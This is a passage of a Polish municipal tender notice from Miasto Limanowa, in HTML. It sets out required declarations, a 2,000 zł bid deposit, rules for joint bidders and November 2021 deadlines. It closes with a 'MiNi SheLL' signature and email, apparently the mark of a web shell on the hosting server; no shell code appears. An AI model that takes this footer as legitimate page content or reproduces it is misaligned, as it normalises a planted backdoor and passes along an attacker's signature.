5 do SWZ;<br/>4) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania, o których mowa w art. 108<br/>ust. 1 pkt 6 ustawy Pzp. tj. o braku zaangażowania Wykonawcy lub podmiotu , który należy z<br/>wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie<br/>konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076 z póżn. zm.), które spowodowałoby zakłócenie<br/>konkurencji lub że spowodowane tym zakłócenie konkurencji zostało wyeliminowane w inny sposób niż<br/>przez wykluczenie wykonawcy z udziału w postepowaniu o udzielenia zamówienia. Wzór oświadczenia<br/>stanowi Załącznik Nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany<br/>do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących<br/>podmiotowych środków dowodowych, o których mowa w art. 273 ust. 1 ustawy Pzp:<br/>1) dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia, wraz z potwierdzeniem, że składka za polisę została opłacona;<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami Wzór wykazu stanowi<br/>Załącznik Nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału<br/>w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp (wzór oświadczenia stanowi<br/>Załącznik Nr 2 do SWZ) w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym<br/>2) pełnomocnictwo (jeżeli dotyczy) w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym,<br/>3) zobowiązanie podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów (jeżeli<br/>dotyczy) wraz z oświadczeniem podmiotu potwierdzającym brak podstaw do wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu w zakresie w jakim wykonawca powołuje się na<br/>jego zasoby (wzór zobowiązania stanowi Załącznik Nr 3 do SWZ) w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>4) dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości 2 000 zł (słownie złotych:<br/>dwa tysiące 00/100).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert, w jednej lub w kilku<br/>następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. Ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz. U. z 2020 r. poz. 299 z póżn. zm.)<br/>3. Wadium wniesione w pieniądzu należy wnieść przelewem na rachunek bankowy<br/>Zamawiającego: Bank Spółdzielczy w Limanowej Nr 71 8804 0000 0000 0023 3100 0004. W<br/>przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje<br/>termin uznania kwoty na rachunku Zamawiającego.<br/>4. Jeżeli wadium wnoszone jest w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt<br/>2)-4), wykonawca przekazuje Zmawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie Pzp,<br/>2) z treści dokumentu musi jednoznacznie wykonać zobowiązanie gwaranta/poręczyciela do<br/>zapłaty całej kwoty wadium,<br/>3) musi być nieodwołane i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego,<br/>4) termin obowiązywania gwarancji lub poręczenia nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem, iż pierwszym dniem związania oferta jest dzień składania ofert),<br/>5) treść dokumentu musi zawierać nazwę zamówienia, którego dotyczy gwarancja lub<br/>poręczenie oraz nazwę Beneficjenta, którym jest Miasto Limanowa, z siedzibą przy ul. Jana<br/>Pawła II 9, 34-600 Limanowa.<br/>5. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub<br/>nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą, lub złożył wniosek o<br/>zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie<br/>odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie:<br/>1) ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie<br/>zobowiązania;<br/>2) zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia;<br/>3) pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną;<br/>fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów;<br/>4) pełnomocnictwo składa się w oryginale lub kopi poświadczonej za zgodność z oryginałem;<br/>5) jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie (konsorcjum) zostanie<br/>wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy zażądać przedstawienia w określonym terminie umowy regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, które zostaną wprowadzone do treści umowy oraz<br/>możliwości zmiany zawartej umowy zawarte zostały w Załączniku Nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com